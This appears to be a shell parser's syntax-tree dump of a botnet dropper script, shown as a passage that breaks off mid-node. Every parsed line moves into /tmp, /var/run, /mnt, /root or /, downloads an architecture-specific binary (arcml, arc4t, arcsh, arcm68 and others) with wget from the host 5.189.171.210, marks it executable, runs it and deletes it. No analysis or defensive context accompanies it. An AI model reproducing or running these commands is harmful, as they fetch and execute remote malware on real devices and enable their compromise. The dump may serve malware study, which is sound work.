ListNode(lineno=2, pos=(12, 137), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 98), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 98), word='http://5.189.171.210/arcms'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(98, 99)),
  CommandNode(lineno=2, pos=(100, 114), parts=[
    WordNode(lineno=2, pos=(100, 105), word='chmod'),
    WordNode(lineno=2, pos=(106, 108), word='+x'),
    WordNode(lineno=2, pos=(109, 114), word='arcms'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(114, 115)),
  CommandNode(lineno=2, pos=(116, 123), parts=[
    WordNode(lineno=2, pos=(116, 123), word='./arcms'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(123, 124)),
  CommandNode(lineno=2, pos=(125, 137), parts=[
    WordNode(lineno=2, pos=(125, 127), word='rm'),
    WordNode(lineno=2, pos=(128, 131), word='-rf'),
    WordNode(lineno=2, pos=(132, 137), word='arcms'),
  ]),
])
ListNode(lineno=3, pos=(138, 263), parts=[
  CommandNode(lineno=3, pos=(138, 145), parts=[
    WordNode(lineno=3, pos=(138, 140), word='cd'),
    WordNode(lineno=3, pos=(141, 145), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(146, 148)),
  CommandNode(lineno=3, pos=(149, 160), parts=[
    WordNode(lineno=3, pos=(149, 151), word='cd'),
    WordNode(lineno=3, pos=(152, 160), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(161, 163)),
  CommandNode(lineno=3, pos=(164, 171), parts=[
    WordNode(lineno=3, pos=(164, 166), word='cd'),
    WordNode(lineno=3, pos=(167, 171), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(172, 174)),
  CommandNode(lineno=3, pos=(175, 183), parts=[
    WordNode(lineno=3, pos=(175, 177), word='cd'),
    WordNode(lineno=3, pos=(178, 183), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(184, 186)),
  CommandNode(lineno=3, pos=(187, 191), parts=[
    WordNode(lineno=3, pos=(187, 189), word='cd'),
    WordNode(lineno=3, pos=(190, 191), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(191, 192)),
  CommandNode(lineno=3, pos=(193, 224), parts=[
    WordNode(lineno=3, pos=(193, 197), word='wget'),
    WordNode(lineno=3, pos=(198, 224), word='http://5.189.171.210/arcml'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(224, 225)),
  CommandNode(lineno=3, pos=(226, 240), parts=[
    WordNode(lineno=3, pos=(226, 231), word='chmod'),
    WordNode(lineno=3, pos=(232, 234), word='+x'),
    WordNode(lineno=3, pos=(235, 240), word='arcml'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(240, 241)),
  CommandNode(lineno=3, pos=(242, 249), parts=[
    WordNode(lineno=3, pos=(242, 249), word='./arcml'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(249, 250)),
  CommandNode(lineno=3, pos=(251, 263), parts=[
    WordNode(lineno=3, pos=(251, 253), word='rm'),
    WordNode(lineno=3, pos=(254, 257), word='-rf'),
    WordNode(lineno=3, pos=(258, 263), word='arcml'),
  ]),
])
ListNode(lineno=4, pos=(264, 389), parts=[
  CommandNode(lineno=4, pos=(264, 271), parts=[
    WordNode(lineno=4, pos=(264, 266), word='cd'),
    WordNode(lineno=4, pos=(267, 271), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(272, 274)),
  CommandNode(lineno=4, pos=(275, 286), parts=[
    WordNode(lineno=4, pos=(275, 277), word='cd'),
    WordNode(lineno=4, pos=(278, 286), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(287, 289)),
  CommandNode(lineno=4, pos=(290, 297), parts=[
    WordNode(lineno=4, pos=(290, 292), word='cd'),
    WordNode(lineno=4, pos=(293, 297), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(298, 300)),
  CommandNode(lineno=4, pos=(301, 309), parts=[
    WordNode(lineno=4, pos=(301, 303), word='cd'),
    WordNode(lineno=4, pos=(304, 309), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(310, 312)),
  CommandNode(lineno=4, pos=(313, 317), parts=[
    WordNode(lineno=4, pos=(313, 315), word='cd'),
    WordNode(lineno=4, pos=(316, 317), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(317, 318)),
  CommandNode(lineno=4, pos=(319, 350), parts=[
    WordNode(lineno=4, pos=(319, 323), word='wget'),
    WordNode(lineno=4, pos=(324, 350), word='http://5.189.171.210/arc4t'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(350, 351)),
  CommandNode(lineno=4, pos=(352, 366), parts=[
    WordNode(lineno=4, pos=(352, 357), word='chmod'),
    WordNode(lineno=4, pos=(358, 360), word='+x'),
    WordNode(lineno=4, pos=(361, 366), word='arc4t'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(366, 367)),
  CommandNode(lineno=4, pos=(368, 375), parts=[
    WordNode(lineno=4, pos=(368, 375), word='./arc4t'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(375, 376)),
  CommandNode(lineno=4, pos=(377, 389), parts=[
    WordNode(lineno=4, pos=(377, 379), word='rm'),
    WordNode(lineno=4, pos=(380, 383), word='-rf'),
    WordNode(lineno=4, pos=(384, 389), word='arc4t'),
  ]),
])
ListNode(lineno=5, pos=(390, 515), parts=[
  CommandNode(lineno=5, pos=(390, 397), parts=[
    WordNode(lineno=5, pos=(390, 392), word='cd'),
    WordNode(lineno=5, pos=(393, 397), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(398, 400)),
  CommandNode(lineno=5, pos=(401, 412), parts=[
    WordNode(lineno=5, pos=(401, 403), word='cd'),
    WordNode(lineno=5, pos=(404, 412), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(413, 415)),
  CommandNode(lineno=5, pos=(416, 423), parts=[
    WordNode(lineno=5, pos=(416, 418), word='cd'),
    WordNode(lineno=5, pos=(419, 423), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(424, 426)),
  CommandNode(lineno=5, pos=(427, 435), parts=[
    WordNode(lineno=5, pos=(427, 429), word='cd'),
    WordNode(lineno=5, pos=(430, 435), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(436, 438)),
  CommandNode(lineno=5, pos=(439, 443), parts=[
    WordNode(lineno=5, pos=(439, 441), word='cd'),
    WordNode(lineno=5, pos=(442, 443), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(443, 444)),
  CommandNode(lineno=5, pos=(445, 476), parts=[
    WordNode(lineno=5, pos=(445, 449), word='wget'),
    WordNode(lineno=5, pos=(450, 476), word='http://5.189.171.210/arc4l'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(476, 477)),
  CommandNode(lineno=5, pos=(478, 492), parts=[
    WordNode(lineno=5, pos=(478, 483), word='chmod'),
    WordNode(lineno=5, pos=(484, 486), word='+x'),
    WordNode(lineno=5, pos=(487, 492), word='arc4l'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(492, 493)),
  CommandNode(lineno=5, pos=(494, 501), parts=[
    WordNode(lineno=5, pos=(494, 501), word='./arc4l'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(501, 502)),
  CommandNode(lineno=5, pos=(503, 515), parts=[
    WordNode(lineno=5, pos=(503, 505), word='rm'),
    WordNode(lineno=5, pos=(506, 509), word='-rf'),
    WordNode(lineno=5, pos=(510, 515), word='arc4l'),
  ]),
])
ListNode(lineno=6, pos=(516, 641), parts=[
  CommandNode(lineno=6, pos=(516, 523), parts=[
    WordNode(lineno=6, pos=(516, 518), word='cd'),
    WordNode(lineno=6, pos=(519, 523), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(524, 526)),
  CommandNode(lineno=6, pos=(527, 538), parts=[
    WordNode(lineno=6, pos=(527, 529), word='cd'),
    WordNode(lineno=6, pos=(530, 538), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(539, 541)),
  CommandNode(lineno=6, pos=(542, 549), parts=[
    WordNode(lineno=6, pos=(542, 544), word='cd'),
    WordNode(lineno=6, pos=(545, 549), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(550, 552)),
  CommandNode(lineno=6, pos=(553, 561), parts=[
    WordNode(lineno=6, pos=(553, 555), word='cd'),
    WordNode(lineno=6, pos=(556, 561), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(562, 564)),
  CommandNode(lineno=6, pos=(565, 569), parts=[
    WordNode(lineno=6, pos=(565, 567), word='cd'),
    WordNode(lineno=6, pos=(568, 569), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(569, 570)),
  CommandNode(lineno=6, pos=(571, 602), parts=[
    WordNode(lineno=6, pos=(571, 575), word='wget'),
    WordNode(lineno=6, pos=(576, 602), word='http://5.189.171.210/arc5l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(602, 603)),
  CommandNode(lineno=6, pos=(604, 618), parts=[
    WordNode(lineno=6, pos=(604, 609), word='chmod'),
    WordNode(lineno=6, pos=(610, 612), word='+x'),
    WordNode(lineno=6, pos=(613, 618), word='arc5l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(618, 619)),
  CommandNode(lineno=6, pos=(620, 627), parts=[
    WordNode(lineno=6, pos=(620, 627), word='./arc5l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(627, 628)),
  CommandNode(lineno=6, pos=(629, 641), parts=[
    WordNode(lineno=6, pos=(629, 631), word='rm'),
    WordNode(lineno=6, pos=(632, 635), word='-rf'),
    WordNode(lineno=6, pos=(636, 641), word='arc5l'),
  ]),
])
ListNode(lineno=7, pos=(642, 767), parts=[
  CommandNode(lineno=7, pos=(642, 649), parts=[
    WordNode(lineno=7, pos=(642, 644), word='cd'),
    WordNode(lineno=7, pos=(645, 649), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(650, 652)),
  CommandNode(lineno=7, pos=(653, 664), parts=[
    WordNode(lineno=7, pos=(653, 655), word='cd'),
    WordNode(lineno=7, pos=(656, 664), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(665, 667)),
  CommandNode(lineno=7, pos=(668, 675), parts=[
    WordNode(lineno=7, pos=(668, 670), word='cd'),
    WordNode(lineno=7, pos=(671, 675), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(676, 678)),
  CommandNode(lineno=7, pos=(679, 687), parts=[
    WordNode(lineno=7, pos=(679, 681), word='cd'),
    WordNode(lineno=7, pos=(682, 687), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(688, 690)),
  CommandNode(lineno=7, pos=(691, 695), parts=[
    WordNode(lineno=7, pos=(691, 693), word='cd'),
    WordNode(lineno=7, pos=(694, 695), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(695, 696)),
  CommandNode(lineno=7, pos=(697, 728), parts=[
    WordNode(lineno=7, pos=(697, 701), word='wget'),
    WordNode(lineno=7, pos=(702, 728), word='http://5.189.171.210/arc6l'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(728, 729)),
  CommandNode(lineno=7, pos=(730, 744), parts=[
    WordNode(lineno=7, pos=(730, 735), word='chmod'),
    WordNode(lineno=7, pos=(736, 738), word='+x'),
    WordNode(lineno=7, pos=(739, 744), word='arc6l'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(744, 745)),
  CommandNode(lineno=7, pos=(746, 753), parts=[
    WordNode(lineno=7, pos=(746, 753), word='./arc6l'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(753, 754)),
  CommandNode(lineno=7, pos=(755, 767), parts=[
    WordNode(lineno=7, pos=(755, 757), word='rm'),
    WordNode(lineno=7, pos=(758, 761), word='-rf'),
    WordNode(lineno=7, pos=(762, 767), word='arc6l'),
  ]),
])
ListNode(lineno=8, pos=(768, 893), parts=[
  CommandNode(lineno=8, pos=(768, 775), parts=[
    WordNode(lineno=8, pos=(768, 770), word='cd'),
    WordNode(lineno=8, pos=(771, 775), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(776, 778)),
  CommandNode(lineno=8, pos=(779, 790), parts=[
    WordNode(lineno=8, pos=(779, 781), word='cd'),
    WordNode(lineno=8, pos=(782, 790), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(791, 793)),
  CommandNode(lineno=8, pos=(794, 801), parts=[
    WordNode(lineno=8, pos=(794, 796), word='cd'),
    WordNode(lineno=8, pos=(797, 801), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(802, 804)),
  CommandNode(lineno=8, pos=(805, 813), parts=[
    WordNode(lineno=8, pos=(805, 807), word='cd'),
    WordNode(lineno=8, pos=(808, 813), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(814, 816)),
  CommandNode(lineno=8, pos=(817, 821), parts=[
    WordNode(lineno=8, pos=(817, 819), word='cd'),
    WordNode(lineno=8, pos=(820, 821), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(821, 822)),
  CommandNode(lineno=8, pos=(823, 854), parts=[
    WordNode(lineno=8, pos=(823, 827), word='wget'),
    WordNode(lineno=8, pos=(828, 854), word='http://5.189.171.210/arc7l'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(854, 855)),
  CommandNode(lineno=8, pos=(856, 870), parts=[
    WordNode(lineno=8, pos=(856, 861), word='chmod'),
    WordNode(lineno=8, pos=(862, 864), word='+x'),
    WordNode(lineno=8, pos=(865, 870), word='arc7l'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(870, 871)),
  CommandNode(lineno=8, pos=(872, 879), parts=[
    WordNode(lineno=8, pos=(872, 879), word='./arc7l'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(879, 880)),
  CommandNode(lineno=8, pos=(881, 893), parts=[
    WordNode(lineno=8, pos=(881, 883), word='rm'),
    WordNode(lineno=8, pos=(884, 887), word='-rf'),
    WordNode(lineno=8, pos=(888, 893), word='arc7l'),
  ]),
])
ListNode(lineno=9, pos=(894, 1019), parts=[
  CommandNode(lineno=9, pos=(894, 901), parts=[
    WordNode(lineno=9, pos=(894, 896), word='cd'),
    WordNode(lineno=9, pos=(897, 901), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(902, 904)),
  CommandNode(lineno=9, pos=(905, 916), parts=[
    WordNode(lineno=9, pos=(905, 907), word='cd'),
    WordNode(lineno=9, pos=(908, 916), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(917, 919)),
  CommandNode(lineno=9, pos=(920, 927), parts=[
    WordNode(lineno=9, pos=(920, 922), word='cd'),
    WordNode(lineno=9, pos=(923, 927), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(928, 930)),
  CommandNode(lineno=9, pos=(931, 939), parts=[
    WordNode(lineno=9, pos=(931, 933), word='cd'),
    WordNode(lineno=9, pos=(934, 939), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(940, 942)),
  CommandNode(lineno=9, pos=(943, 947), parts=[
    WordNode(lineno=9, pos=(943, 945), word='cd'),
    WordNode(lineno=9, pos=(946, 947), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(947, 948)),
  CommandNode(lineno=9, pos=(949, 980), parts=[
    WordNode(lineno=9, pos=(949, 953), word='wget'),
    WordNode(lineno=9, pos=(954, 980), word='http://5.189.171.210/arcsh'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(980, 981)),
  CommandNode(lineno=9, pos=(982, 996), parts=[
    WordNode(lineno=9, pos=(982, 987), word='chmod'),
    WordNode(lineno=9, pos=(988, 990), word='+x'),
    WordNode(lineno=9, pos=(991, 996), word='arcsh'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(996, 997)),
  CommandNode(lineno=9, pos=(998, 1005), parts=[
    WordNode(lineno=9, pos=(998, 1005), word='./arcsh'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1005, 1006)),
  CommandNode(lineno=9, pos=(1007, 1019), parts=[
    WordNode(lineno=9, pos=(1007, 1009), word='rm'),
    WordNode(lineno=9, pos=(1010, 1013), word='-rf'),
    WordNode(lineno=9, pos=(1014, 1019), word='arcsh'),
  ]),
])
ListNode(lineno=10, pos=(1020, 1145), parts=[
  CommandNode(lineno=10, pos=(1020, 1027), parts=[
    WordNode(lineno=10, pos=(1020, 1022), word='cd'),
    WordNode(lineno=10, pos=(1023, 1027), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1028, 1030)),
  CommandNode(lineno=10, pos=(1031, 1042), parts=[
    WordNode(lineno=10, pos=(1031, 1033), word='cd'),
    WordNode(lineno=10, pos=(1034, 1042), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1043, 1045)),
  CommandNode(lineno=10, pos=(1046, 1053), parts=[
    WordNode(lineno=10, pos=(1046, 1048), word='cd'),
    WordNode(lineno=10, pos=(1049, 1053), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1054, 1056)),
  CommandNode(lineno=10, pos=(1057, 1065), parts=[
    WordNode(lineno=10, pos=(1057, 1059), word='cd'),
    WordNode(lineno=10, pos=(1060, 1065), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1066, 1068)),
  CommandNode(lineno=10, pos=(1069, 1073), parts=[
    WordNode(lineno=10, pos=(1069, 1071), word='cd'),
    WordNode(lineno=10, pos=(1072, 1073), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1073, 1074)),
  CommandNode(lineno=10, pos=(1075, 1106), parts=[
    WordNode(lineno=10, pos=(1075, 1079), word='wget'),
    WordNode(lineno=10, pos=(1080, 1106), word='http://5.189.171.210/arcpc'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1106, 1107)),
  CommandNode(lineno=10, pos=(1108, 1122), parts=[
    WordNode(lineno=10, pos=(1108, 1113), word='chmod'),
    WordNode(lineno=10, pos=(1114, 1116), word='+x'),
    WordNode(lineno=10, pos=(1117, 1122), word='arcpc'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1122, 1123)),
  CommandNode(lineno=10, pos=(1124, 1131), parts=[
    WordNode(lineno=10, pos=(1124, 1131), word='./arcpc'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1131, 1132)),
  CommandNode(lineno=10, pos=(1133, 1145), parts=[
    WordNode(lineno=10, pos=(1133, 1135), word='rm'),
    WordNode(lineno=10, pos=(1136, 1139), word='-rf'),
    WordNode(lineno=10, pos=(1140, 1145), word='arcpc'),
  ]),
])
ListNode(lineno=11, pos=(1146, 1275), parts=[
  CommandNode(lineno=11, pos=(1146, 1153), parts=[
    WordNode(lineno=11, pos=(1146, 1148), word='cd'),
    WordNode(lineno=11, pos=(1149, 1153), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1154, 1156)),
  CommandNode(lineno=11, pos=(1157, 1168), parts=[
    WordNode(lineno=11, pos=(1157, 1159), word='cd'),
    WordNode(lineno=11, pos=(1160, 1168), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1169, 1171)),
  CommandNode(lineno=11, pos=(1172, 1179), parts=[
    WordNode(lineno=11, pos=(1172, 1174), word='cd'),
    WordNode(lineno=11, pos=(1175, 1179), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1180, 1182)),
  CommandNode(lineno=11, pos=(1183, 1191), parts=[
    WordNode(lineno=11, pos=(1183, 1185), word='cd'),
    WordNode(lineno=11, pos=(1186, 1191), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1192, 1194)),
  CommandNode(lineno=11, pos=(1195, 1199), parts=[
    WordNode(lineno=11, pos=(1195, 1197), word='cd'),
    WordNode(lineno=11, pos=(1198, 1199), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1199, 1200)),
  CommandNode(lineno=11, pos=(1201, 1233), parts=[
    WordNode(lineno=11, pos=(1201, 1205), word='wget'),
    WordNode(lineno=11, pos=(1206, 1233), word='http://5.189.171.210/arc440'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1233, 1234)),
  CommandNode(lineno=11, pos=(1235, 1250), parts=[
    WordNode(lineno=11, pos=(1235, 1240), word='chmod'),
    WordNode(lineno=11, pos=(1241, 1243), word='+x'),
    WordNode(lineno=11, pos=(1244, 1250), word='arc440'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1250, 1251)),
  CommandNode(lineno=11, pos=(1252, 1260), parts=[
    WordNode(lineno=11, pos=(1252, 1260), word='./arc440'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1260, 1261)),
  CommandNode(lineno=11, pos=(1262, 1275), parts=[
    WordNode(lineno=11, pos=(1262, 1264), word='rm'),
    WordNode(lineno=11, pos=(1265, 1268), word='-rf'),
    WordNode(lineno=11, pos=(1269, 1275), word='arc440'),
  ]),
])
ListNode(lineno=12, pos=(1276, 1405), parts=[
  CommandNode(lineno=12, pos=(1276, 1283), parts=[
    WordNode(lineno=12, pos=(1276, 1278), word='cd'),
    WordNode(lineno=12, pos=(1279, 1283), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1284, 1286)),
  CommandNode(lineno=12, pos=(1287, 1298), parts=[
    WordNode(lineno=12, pos=(1287, 1289), word='cd'),
    WordNode(lineno=12, pos=(1290, 1298), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1299, 1301)),
  CommandNode(lineno=12, pos=(1302, 1309), parts=[
    WordNode(lineno=12, pos=(1302, 1304), word='cd'),
    WordNode(lineno=12, pos=(1305, 1309), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1310, 1312)),
  CommandNode(lineno=12, pos=(1313, 1321), parts=[
    WordNode(lineno=12, pos=(1313, 1315), word='cd'),
    WordNode(lineno=12, pos=(1316, 1321), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1322, 1324)),
  CommandNode(lineno=12, pos=(1325, 1329), parts=[
    WordNode(lineno=12, pos=(1325, 1327), word='cd'),
    WordNode(lineno=12, pos=(1328, 1329), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1329, 1330)),
  CommandNode(lineno=12, pos=(1331, 1363), parts=[
    WordNode(lineno=12, pos=(1331, 1335), word='wget'),
    WordNode(lineno=12, pos=(1336, 1363), word='http://5.189.171.210/arcm68'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1363, 1364)),
  CommandNode(lineno=12, pos=(1365, 1380), parts=[
    WordNode(lineno=12, pos=(1365, 1370), word='chmod'),
    WordNode(lineno=12, pos=(1371, 1373), word='+x'),
    WordNode(lineno=12, pos=(1374, 1380), word='arcm68'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1380, 1381)),
  CommandNode(lineno=12, pos=(1382, 1390), parts=[
    WordNode(lineno=12, pos=(1382, 1390), word='./arcm68'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1390, 1391)),
  CommandNode(lineno=12, pos=(1392, 1405), parts=[
    WordNode(lineno=12, pos=(1392, 1394), word='rm'),
    WordNode(lineno=12, pos=(1395, 1398), word='-rf'),
    WordNode(lineno=12, pos=(1399, 1405), word='arcm68'),
  ]),
])
ListNode(lineno=13, pos=(1406, 1539), parts=[
  CommandNode(lineno=13, pos=(1406, 1413), parts=[
    WordNode(lineno=13, pos=(1406, 1408), word='cd'),
    WordNode(lineno=13, pos=(1409, 1413), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1414, 1416)),
  CommandNode(lineno=13, pos=(1417, 1428), parts=[
    WordNode(lineno=13, pos=(1417, 1419), word='cd'),
    WordNode(lineno=13, pos=(1420, 1428), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1429, 1431)),
  CommandNode(lineno=13, pos=(1432, 1439), parts=[
    WordNode(lineno=13, pos=(1432, 1434), word='cd'),
    WordNode(lineno=13, pos=(1435, 1439), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1440, 1442)),
  CommandNode(lineno=13, pos=(1443, 1451), parts=[
    WordNode(lineno=13, pos=(1443, 1445), word='cd'),
    WordNode(lineno=13, pos=(1446, 1451), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1452, 1454)),
  CommandNode(lineno=13, pos=(1455, 1459), parts=[
    WordNode(lineno=13, pos=(1455, 1457), word='cd'),
    WordNode(lineno=13, pos=(1458, 1459), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1459, 1460)),
  CommandNode(lineno=13, pos=(1461, 1494), parts=[
    WordNode(lineno=13, pos=(1461, 1465), word='wget'),
    WordNode(lineno=13, pos=(1466, 1494), word='http://5.189.171.210/arcsprc'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1494, 1495)),
  CommandNode(lineno=13, pos=(1496, 1512), parts=[
    WordNode(lineno=13, pos=(1496, 1501), word='chmod'),
    WordNode(lineno=13, pos=(1502, 1504), word='+x'),
    WordNode(lineno=13, pos=(1505, 1512), word='arcsprc'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1512, 1513)),
  CommandNode(lineno=13, pos=(1514, 1523), parts=[
    WordNode(lineno=13, pos=(1514, 1523), word='./arcsprc'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1523, 1524)),
  CommandNode(lineno=13, pos=(1525, 1539), parts=[
    WordNode(lineno=13, pos=(1525, 1527), word='rm'),
    WordNode(lineno=13, pos=(1528, 1531), word='-rf'),
    WordNode(lineno=13, pos=(1532, 1539), word='arcsprc'),
  ]),
])
ListNode(lineno=14, pos=(1540, 1665), parts=[
  CommandNode(lineno=14, pos=(1540, 1547), parts=[
    WordNode(lineno=14, pos=(1540, 1542), word='cd'),
    WordNode(lineno=14, pos=(1543, 1547), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1548, 1550)),
  CommandNode(lineno=14, pos=(1551, 1562), parts=[
    WordNode(lineno=14, pos=(1551, 1553), word='cd'),
    WordNode(lineno=14, pos=(1554, 1562), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1563, 1565)),
  CommandNode(lineno=14, pos=(1566, 1573), parts=[
    WordNode(lineno=14, pos=(1566, 1568), word='cd'),
    WordNode(lineno=14, pos=(1569, 1573), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1574, 1576)),
  CommandNode(lineno=14, pos=(1577, 1585), parts=[
    WordNode(lineno=14, pos=(1577, 1579), word='cd'),
    WordNode(lineno=14, pos=(1580, 1585), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1586, 1588)),
  CommandNode(lineno=14, pos=(1589, 1593), parts=[
    WordNode(lineno=14, pos=(1589, 1591), word='cd'),
    WordNode(lineno=14, pos=(1592, 1593), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1593, 1594)),
  CommandNode(lineno=14, pos=(1595, 1626), parts=[
    WordNode(lineno=14, pos=(1595, 1599), word='wget'),
    WordNode(lineno=14, pos=(1600, 1626), word='http://5.189.171.210/arc32'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1626, 1627)),
  CommandNode(lineno=14, pos=(1628, 1642), parts=[
    WordNode(lineno=14, pos=(1628, 1633), word='chmod'),
    WordNode(lineno=14, pos=(1634, 1636), word='+x'),
    WordNode(lineno=14, pos=(1637, 1642), word='arc32'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1642, 1643)),
  CommandNode(lineno=14, pos=(1644, 1651), parts=[
    WordNode(lineno=14, pos=(1644, 1651), word='./arc32'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1651, 1652)),
  CommandNode(lineno=14, pos=(1653, 1665), parts=[
    WordNode(lineno=14, pos=(1653, 1655), word='rm'),
    WordNode(lineno=14, pos=(1656, 1659), word='-rf'),
    WordNode(lineno=14, pos=(1660, 1665), word='arc32'),
  ]),
])
ListNode(lineno=15, pos=(1666, 1791), parts=[
  CommandNode(lineno=15, pos=(1666, 1673), parts=[
    WordNode(lineno=15, pos=(1666, 1668), word='cd'),
    WordNode(lineno=15, pos=(1669, 1673), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1674, 1676)),
  CommandNode(lineno=15, pos=(1677, 1688), parts=[
    WordNode(lineno=15, pos=(1677, 1679), word='cd'),
    WordNode(lineno=15, pos=(1680, 1688), word='/var/run'),
  ]),
